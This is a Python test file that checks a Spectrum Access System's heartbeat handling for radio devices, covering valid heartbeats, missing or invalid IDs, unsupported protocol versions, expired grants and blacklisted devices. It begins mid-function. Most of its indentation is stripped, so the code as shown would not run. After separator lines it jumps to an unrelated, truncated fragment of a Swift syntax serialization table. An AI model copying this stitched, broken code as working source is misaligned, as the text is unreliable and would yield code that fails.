(transmit_expire_time - datetime.utcnow()).total_seconds(), 240)
self.assertLessEqual(transmit_expire_time, grant_expire_time)
self.assertEqual(response['response']['responseCode'], 0)
del request, response
# Get measReport
meas_report = json.load(
open(os.path.join('testcases', 'testdata', 'meas_report_0.json')))
# Second Heartbeat Request with measReport
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED',
'measReport': meas_report
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
transmit_expire_time = datetime.strptime(response['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertLessEqual(transmit_expire_time, grant_expire_time)
self.assertLessEqual(
(transmit_expire_time - datetime.utcnow()).total_seconds(), 240)
self.assertEqual(response['response']['responseCode'], 0)
@winnforum_testcase
def test_WINNF_FT_S_HBT_6(self):
"""Array request: SAS-directed Heartbeat Req: SAS has requested CBSD to
perform measurement through measReportConfig in Grant response or a
previous Heartbeat Response.
The response should be SUCCESS.
"""
# Register the devices
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
device_c = json.load(
open(os.path.join('testcases', 'testdata', 'device_c.json')))
devices = [device_a, device_c]
for device in devices:
self._sas_admin.InjectFccId({'fccId': device['fccId']})
device_a['measCapability'] = ['EUTRA_CARRIER_RSSI_ALWAYS']
request = {'registrationRequest': devices}
response = self._sas.Registration(request)['registrationResponse']
# Check registration response
cbsd_ids = []
self.assertEqual(len(response), len(devices))
for resp in response:
self.assertEqual(resp['response']['responseCode'], 0)
cbsd_ids.append(resp['cbsdId'])
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_ids[0]
grant_1 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_1['cbsdId'] = cbsd_ids[1]
request = {'grantRequest': [grant_0, grant_1]}
# Check grant response
response = self._sas.Grant(request)['grantResponse']
self.assertEqual(len(response), len(cbsd_ids))
grant_expire_times = []
grant_ids = []
for resp_number, resp in enumerate(response):
self.assertEqual(resp['cbsdId'], cbsd_ids[resp_number])
self.assertTrue(resp['grantId'])
self.assertEqual(resp['response']['responseCode'], 0)
grant_ids.append(resp['grantId'])
grant_expire_times.append(
datetime.strptime(resp['grantExpireTime'],
'%Y-%m-%dT%H:%M:%SZ'))
del request, response
# Trigger SAS to request a measurement report in all subsequent heartbeat responses
self._sas_admin.TriggerMeasurementReportHeartbeat({'measReportConfig':
['EUTRA_CARRIER_RSSI_ALWAYS']})
# First Heartbeat Request to Authorize the Device
heartbeat_request = [{
'cbsdId': cbsd_ids[0],
'grantId': grant_ids[0],
'operationState': 'GRANTED'
}, {
'cbsdId': cbsd_ids[1],
'grantId': grant_ids[1],
'operationState': 'GRANTED'
}]
request = {'heartbeatRequest': heartbeat_request}
response = self._sas.Heartbeat(request)['heartbeatResponse']
# Check the heartbeat response
for resp_number, resp in enumerate(response):
self.assertEqual(resp['cbsdId'], cbsd_ids[resp_number])
self.assertEqual(resp['grantId'], grant_ids[resp_number])
transmit_expire_time = datetime.strptime(resp['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertLessEqual(
(transmit_expire_time - datetime.utcnow()).total_seconds(), 240)
self.assertLessEqual(transmit_expire_time, grant_expire_times[resp_number])
self.assertEqual(resp['response']['responseCode'], 0)
self.assertTrue('EUTRA_CARRIER_RSSI_ALWAYS' in response[0]['measReportConfig'])
del request, response
# Get measReport
meas_report = json.load(
open(os.path.join('testcases', 'testdata', 'meas_report_0.json')))
# Heartbeat Request
heartbeat_request = [{
'cbsdId': cbsd_ids[0],
'grantId': grant_ids[0],
'operationState': 'GRANTED',
'measReport': meas_report
}, {
'cbsdId': cbsd_ids[1],
'grantId': grant_ids[1],
'operationState': 'GRANTED'
}]
request = {'heartbeatRequest': heartbeat_request}
response = self._sas.Heartbeat(request)['heartbeatResponse']
# Check the heartbeat response
for resp_number, resp in enumerate(response):
self.assertEqual(resp['cbsdId'], cbsd_ids[resp_number])
self.assertEqual(resp['grantId'], grant_ids[resp_number])
transmit_expire_time = datetime.strptime(resp['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertLessEqual(
(transmit_expire_time - datetime.utcnow()).total_seconds(), 240)
self.assertLessEqual(transmit_expire_time, grant_expire_times[resp_number])
self.assertEqual(resp['response']['responseCode'], 0)
@winnforum_testcase
def test_WINNF_FT_S_HBT_9(self):
"""Initial Heartbeat Request (immediately after CBSD moves
into Granted State) is from a CBSD with an unsupported protocol
version by SAS.
The response should be FAIL, code 100.
"""
# Register the device
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertTrue(response['grantId'])
self.assertEqual(response['response']['responseCode'], 0)
grant_id = response['grantId']
del request, response
# Save SAS version
version = self._sas._sas_version
# Use higher than supported version
self._sas._sas_version = 'v2.0'
# First Heartbeat with unsupported SAS-CBSD protocol version
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
try:
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['response']['responseCode'], 100)
except AssertionError as e:
# Allow HTTP status 404
self.assertEqual(e.args[0], 404)
finally:
# Put SAS version back
self._sas._sas_version = version
@winnforum_testcase
def test_10_9_4_2_3_1_1(self):
"""CBSD heartbeat request with missing cbsdId parameter.
Heartbeat request immediately after CBSD moves into Granted State. The
cbsdId is missing in heartbeat request. The response should be FAIL.
"""
# Register the device
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertTrue(response['grantId'])
self.assertEqual(response['response']['responseCode'], 0)
grant_id = response['grantId']
del request, response
# First successful Heartbeat
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
self.assertLess(datetime.utcnow(),
datetime.strptime(response['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(response['response']['responseCode'], 0)
del request, response
# cbsdId is missing
request = {
'heartbeatRequest': [{
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['response']['responseCode'], 102)
@winnforum_testcase
def test_WINNF_FT_S_HBT_10(self):
"""Initial Heartbeat Request (immediately after CBSD moves
into Granted State) is from three CBSDs with an unsupported
protocol version by SAS.
The response should be FAIL, code 100.
"""
# Register the devices
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
device_b = json.load(
open(os.path.join('testcases', 'testdata', 'device_e.json')))
self._sas_admin.InjectFccId({'fccId': device_b['fccId']})
device_c = json.load(
open(os.path.join('testcases', 'testdata', 'device_c.json')))
self._sas_admin.InjectFccId({'fccId': device_c['fccId']})
request = {'registrationRequest': [device_a, device_b, device_c]}
response = self._sas.Registration(request)['registrationResponse']
# Check registration response
for resp in response:
self.assertEqual(resp['response']['responseCode'], 0)
cbsd_ids = [resp['cbsdId'] for resp in response]
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_ids[0]
grant_1 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_1['cbsdId'] = cbsd_ids[1]
grant_2 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_2['cbsdId'] = cbsd_ids[2]
request = {'grantRequest': [grant_0, grant_1, grant_2]}
# Check grant response
response = self._sas.Grant(request)['grantResponse']
self.assertEqual(len(response), len(cbsd_ids))
for resp_number, resp in enumerate(response):
self.assertEqual(resp['cbsdId'], cbsd_ids[resp_number])
self.assertTrue(resp['grantId'])
self.assertEqual(resp['response']['responseCode'], 0)
grant_ids = (response[0]['grantId'], response[1]['grantId'], response[2]['grantId'])
del request, response
# Save sas version
version = self._sas._sas_version
# Use higher than supported version
self._sas._sas_version = 'v2.0'
# First Heartbeat with unsupported SAS-CBSD protocol version
heartbeat_0 = {
'cbsdId': cbsd_ids[0],
'grantId': grant_ids[0],
'operationState': 'GRANTED'
}
heartbeat_1 = {
'cbsdId': cbsd_ids[1],
'grantId': grant_ids[1],
'operationState': 'GRANTED'
}
heartbeat_2 = {
'cbsdId': cbsd_ids[2],
'grantId': grant_ids[2],
'operationState': 'GRANTED'
}
request = {'heartbeatRequest': [heartbeat_0, heartbeat_1, heartbeat_2]}
try:
response = self._sas.Heartbeat(request)['heartbeatResponse']
self.assertEqual(len(response), len(grant_ids))
for resp in response:
# Check the heartbeat response
self.assertEqual(resp['response']['responseCode'], 100)
except AssertionError as e:
# Allow HTTP status 404
self.assertEqual(e.args[0], 404)
finally:
# Put sas version back
self._sas._sas_version = version
@winnforum_testcase
def test_10_9_4_2_3_1_2(self):
"""CBSD heartbeat request with missing grantId parameter.
Heartbeat request immediately after CBSD moves into Granted State. The
grantId is missing in heartbeat request. The response should be FAIL.
"""
# Register the device
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertTrue(response['grantId'])
self.assertEqual(response['response']['responseCode'], 0)
grant_id = response['grantId']
del request, response
# First successful Heartbeat
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
self.assertLess(datetime.utcnow(),
datetime.strptime(response['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(response['response']['responseCode'], 0)
del request, response
# grantId is missing
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['response']['responseCode'], 102)
@winnforum_testcase
def test_10_9_4_2_3_1_3(self):
"""CBSD heartbeat request with missing operationState parameter.
Heartbeat request immediately after CBSD moves into Granted State. The
operationState is missing in heartbeat request. The response should be FAIL.
"""
# Register the device
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertTrue(response['grantId'])
self.assertEqual(response['response']['responseCode'], 0)
grant_id = response['grantId']
del request, response
# First successful Heartbeat
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
self.assertLess(datetime.utcnow(),
datetime.strptime(response['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(response['response']['responseCode'], 0)
del request, response
# operationState is missing
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['response']['responseCode'], 102)
@winnforum_testcase
def test_WINNF_FT_S_HBT_14(self):
"""CBSD heartbeat requests with various missing parameter.
Heartbeat request immediately after CBSD moves into Granted State.
Three requests out of the four have some needed parameter missing.
The response should be FAIL.
"""
# Register the devices
registration_request = []
for device_filename in ('device_a.json', 'device_b.json', 'device_c.json',
'device_d.json'):
device = json.load(
open(os.path.join('testcases', 'testdata', device_filename)))
self._sas_admin.InjectFccId({'fccId': device['fccId']})
registration_request.append(device)
request = {'registrationRequest': registration_request}
response = self._sas.Registration(request)['registrationResponse']
# Check registration response
cbsd_ids = []
for resp in response:
self.assertEqual(resp['response']['responseCode'], 0)
cbsd_ids.append(resp['cbsdId'])
del request, response
# Request grant
grant_request = []
for cbsd_id in cbsd_ids:
grant = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant['cbsdId'] = cbsd_id
grant_request.append(grant)
request = {'grantRequest': grant_request}
# Check grant response
response = self._sas.Grant(request)['grantResponse']
grant_ids = []
grant_expire_times = []
for response_num, resp in enumerate(response):
self.assertEqual(resp['cbsdId'], cbsd_ids[response_num])
self.assertEqual(resp['response']['responseCode'], 0)
grant_ids.append(resp['grantId'])
grant_expire_times.append(
datetime.strptime(resp['grantExpireTime'],
'%Y-%m-%dT%H:%M:%SZ'))
del request, response
# Prepare Heartbeats (these are first heartbeats)
# 1. valid, 2. no cbsd_id, 3. no grantId, 4. no operationState
heartbeat_request = [{
'cbsdId': cbsd_ids[0],
'grantId': grant_ids[0],
'operationState': 'GRANTED'
}, {
'grantId': grant_ids[1],
'operationState': 'GRANTED'
}, {
'cbsdId': cbsd_ids[2],
'operationState': 'GRANTED'
}, {
'cbsdId': cbsd_ids[3],
'grantId': grant_ids[3],
}]
request = {'heartbeatRequest': heartbeat_request}
response = self._sas.Heartbeat(request)['heartbeatResponse']
# Check the heartbeat response
self.assertEqual(len(response), 4)
# check the cbsdId and grantId where the request message had accurate values
for response_num in (0, 3):
self.assertEqual(response[response_num]['cbsdId'], cbsd_ids[response_num])
self.assertEqual(response[response_num]['grantId'],
grant_ids[response_num])
self.assertEqual(response[0]['response']['responseCode'], 0)
transmit_expire_time = datetime.strptime(response[0]['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertLessEqual(
(transmit_expire_time - datetime.utcnow()).total_seconds(), 240)
self.assertLess(transmit_expire_time, grant_expire_times[0])
self.assertTrue(response[1]['response']['responseCode'] in (102, 105))
for response_num in (2, 3):
self.assertEqual(response[response_num]['response']['responseCode'], 102)
@winnforum_testcase
def test_WINNF_FT_S_HBT_15(self):
"""CBSD heartbeat request with invalid grantId parameter.
Heartbeat request immediately after CBSD moves into Granted State. The
grantId is invalid in heartbeat request. The response should be FAIL.
"""
# Register the device
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['response']['responseCode'], 0)
grant_id = response['grantId']
del request, response
# First successful Heartbeat
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
transmit_expire_time_1 = datetime.strptime(response['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
self.assertEqual(response['response']['responseCode'], 0)
del request, response
# Send second heartbeat request with an invalid grantId
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id + '-changed',
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertTrue(response['response']['responseCode'] in (103, 105))
self.assertLessEqual(
datetime.strptime(response['transmitExpireTime'], '%Y-%m-%dT%H:%M:%SZ'),
transmit_expire_time_1)
@winnforum_testcase
def test_WINNF_FT_S_HBT_16(self):
"""CBSD heartbeat request after grant is terminated.
Heartbeat request immediately after CBSD moves out of Granted State. The
grantId is invalid in heartbeat request. The response should be FAIL.
"""
# Register the device
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['response']['responseCode'], 0)
grant_id = response['grantId']
grant_expire_time = datetime.strptime(response['grantExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
del request, response
# First successful Heartbeat
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
self.assertEqual(response['response']['responseCode'], 0)
# Enter the Authorized state
request['heartbeatRequest'][0]['operationState'] = 'AUTHORIZED'
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Verify successful response
transmit_expire_time = datetime.strptime(response['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertEqual(response['response']['responseCode'], 0)
del request, response
# Relinquish the grant
# Note: The test case requires the grant to be terminated at this point, but
# here the grant is being relinquished instead. The test case document will be
# updated later to use this method.
request = {
'relinquishmentRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id
}]
}
response = self._sas.Relinquishment(request)['relinquishmentResponse'][0]
# Check the relinquishment response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
self.assertEqual(response['response']['responseCode'], 0)
# use relinquished grantId in new heartbeat request after transmitExpireTime
# is passed, but before the grant expiry
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
transmit_expiry_wait_time = (
transmit_expire_time - datetime.utcnow()).total_seconds()
time.sleep(transmit_expiry_wait_time + 1)
self.assertGreater(datetime.utcnow(), transmit_expire_time)
self.assertLess(datetime.utcnow(), grant_expire_time)
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertTrue(response['response']['responseCode'] in (103, 500))
self.assertLessEqual(
datetime.strptime(response['transmitExpireTime'], '%Y-%m-%dT%H:%M:%SZ'),
transmit_expire_time)
@winnforum_testcase
def test_WINNF_FT_S_HBT_17(self):
"""Heartbeat Request from CBSD in Registered state (immediately after CBSD's grant is expired)
Response Code should be 103 or 500"""
# Register the device
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['response']['responseCode'], 0)
grant_id = response['grantId']
grant_expire_time = datetime.strptime(response['grantExpireTime'], '%Y-%m-%dT%H:%M:%SZ')
del request, response
    # Calculate the difference between the current time and grantExpireTime
    difference_time = (grant_expire_time - datetime.utcnow()).total_seconds()
    logging.debug('Difference between grantExpireTime and current time (in seconds): %s',
                  difference_time)
self.assertGreaterEqual(grant_expire_time, datetime.utcnow())
time.sleep(difference_time + 1)
# Request Heartbeat
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
    # Response should fail with responseCode 103 or 500
self.assertTrue(response['response']['responseCode'] in (103, 500))
@winnforum_testcase
def test_WINNF_FT_S_HBT_18(self):
"""CBSD heartbeat requests with invalid parameter(s).
Heartbeat request immediately after CBSD moves into Granted State.
The requests have some parameter with invalid value
The response should be FAIL.
"""
# Register the devices
registration_request = []
for device_filename in ('device_a.json', 'device_b.json', 'device_c.json'):
device = json.load(
open(os.path.join('testcases', 'testdata', device_filename)))
self._sas_admin.InjectFccId({'fccId': device['fccId']})
registration_request.append(device)
request = {'registrationRequest': registration_request}
response = self._sas.Registration(request)['registrationResponse']
# Check registration response
cbsd_ids = []
for resp in response:
self.assertEqual(resp['response']['responseCode'], 0)
cbsd_ids.append(resp['cbsdId'])
del request, response
# Request grant
grant_request = []
for cbsd_id in cbsd_ids:
grant = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant['cbsdId'] = cbsd_id
grant_request.append(grant)
request = {'grantRequest': grant_request}
# Check grant response
response = self._sas.Grant(request)['grantResponse']
grant_ids = []
grant_expire_times = []
for response_num, resp in enumerate(response):
self.assertEqual(resp['cbsdId'], cbsd_ids[response_num])
self.assertEqual(resp['response']['responseCode'], 0)
grant_ids.append(resp['grantId'])
grant_expire_times.append(
datetime.strptime(resp['grantExpireTime'], '%Y-%m-%dT%H:%M:%SZ'))
del request, response
# Prepare Heartbeats
# No. 1,2 - valid requests, No. 3 - invalid grantId in request
heartbeat_request = [{
'cbsdId': cbsd_ids[0],
'grantId': grant_ids[0],
'operationState': 'GRANTED'
}, {
'cbsdId': cbsd_ids[1],
'grantId': grant_ids[1],
'operationState': 'GRANTED'
}, {
'cbsdId': cbsd_ids[2],
'grantId': grant_ids[2] + '-changed',
'operationState': 'GRANTED'
}]
request = {'heartbeatRequest': heartbeat_request}
response = self._sas.Heartbeat(request)['heartbeatResponse']
# Check heartbeat response
self.assertEqual(len(response), 3)
for response_num in (0, 1):
self.assertEqual(response[response_num]['cbsdId'], cbsd_ids[response_num])
self.assertEqual(response[response_num]['grantId'],
grant_ids[response_num])
self.assertEqual(response[2]['cbsdId'], cbsd_ids[2])
self.assertFalse('grantId' in response[2])
for response_num in (0, 1):
self.assertEqual(response[response_num]['response']['responseCode'], 0)
transmit_expire_time = datetime.strptime(
response[response_num]['transmitExpireTime'], '%Y-%m-%dT%H:%M:%SZ')
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertLessEqual(
(transmit_expire_time - datetime.utcnow()).total_seconds(), 240)
self.assertLessEqual(transmit_expire_time,
grant_expire_times[response_num])
self.assertEqual(response[2]['response']['responseCode'], 103)
# No need to check transmitExpireTime because this is the first heartbeat
@winnforum_testcase
def test_WINNF_FT_S_HBT_19(self):
"""Heartbeat Request from CBSD in Granted or Authorized state
(immediately after CBSD moves into Granted State or following
a Heartbeat Response) requires CBSD to de-register.
The response should be FAIL, code 105."""
# Register the device
device_a = json.load(open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertTrue(response['grantId'])
self.assertEqual(response['response']['responseCode'], 0)
grant_id = response['grantId']
del request, response
# Inject Device into Blacklist
self._sas_admin.BlacklistByFccId({'fccId': device_a['fccId']})
# Request Heartbeat
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the first heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
self.assertTrue('transmitExpireTime' in response)
self.assertEqual(response['response']['responseCode'], 105)
@winnforum_testcase
def test_WINNF_FT_S_HBT_20(self):
"""Heartbeat Request from CBSDs in Granted or Authorized state
    (immediately after CBSDs move into Granted State or following
a Heartbeat Response) requires CBSDs to de-register.
The response should be FAIL, code 105.
"""
# Register the devices
registration_request = []
fcc_ids = []
for device_filename in ('device_a.json', 'device_c.json', 'device_e.json'):
device = json.load(
open(os.path.join('testcases', 'testdata', device_filename)))
fcc_ids.append(device['fccId'])
self._sas_admin.InjectFccId({'fccId': device['fccId']})
registration_request.append(device)
request = {'registrationRequest': registration_request}
response = self._sas.Registration(request)['registrationResponse']
# Check registration response
for resp in response:
self.assertEqual(resp['response']['responseCode'], 0)
cbsd_ids = [resp['cbsdId'] for resp in response]
del request, response
# Request grant
grant_request = []
for cbsd_id in cbsd_ids:
grant = json.load(open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant['cbsdId'] = cbsd_id
grant_request.append(grant)
request = {'grantRequest': grant_request}
# Check grant response
response = self._sas.Grant(request)['grantResponse']
self.assertEqual(len(response), len(cbsd_ids))
grant_expire_time = []
for resp_number, resp in enumerate(response):
self.assertEqual(resp['cbsdId'], cbsd_ids[resp_number])
self.assertTrue(resp['grantId'])
self.assertEqual(resp['response']['responseCode'], 0)
grant_expire_time.append(
datetime.strptime(resp['grantExpireTime'], '%Y-%m-%dT%H:%M:%SZ'))
grant_ids = [resp['grantId'] for resp in response]
del request, response
# Inject Third Device into Blacklist
self._sas_admin.BlacklistByFccId({'fccId': fcc_ids[2]})
# First Heartbeat Request
heartbeat_request = []
for cbsd_id, grant_id in zip(cbsd_ids, grant_ids):
heartbeat_request.append({
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
})
request = {'heartbeatRequest': heartbeat_request}
response = self._sas.Heartbeat(request)['heartbeatResponse']
self.assertEqual(len(response), len(grant_ids))
# Check the heartbeat response
    # The first two devices are not blacklisted and must have responseCode 0
for index, resp in enumerate(response[:2]):
self.assertEqual(resp['cbsdId'], cbsd_ids[index])
self.assertEqual(resp['grantId'], grant_ids[index])
transmit_expire_time = datetime.strptime(resp['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertLessEqual(
(transmit_expire_time - datetime.utcnow()).total_seconds(), 240)
self.assertLessEqual(transmit_expire_time,
grant_expire_time[index])
self.assertEqual(resp['response']['responseCode'], 0)
    # The last device is blacklisted and must have responseCode 105
self.assertEqual(response[2]['cbsdId'], cbsd_ids[2])
self.assertEqual(response[2]['grantId'], grant_ids[2])
self.assertTrue('transmitExpireTime' in response[2])
self.assertEqual(response[2]['response']['responseCode'], 105)
|
|
from .Node import error
SYNTAX_NODE_SERIALIZATION_CODES = {
# 0 is 'Token'. Needs to be defined manually
# 1 is 'Unknown'. Needs to be defined manually
'UnknownDecl': 2,
'TypealiasDecl': 3,
'AssociatedtypeDecl': 4,
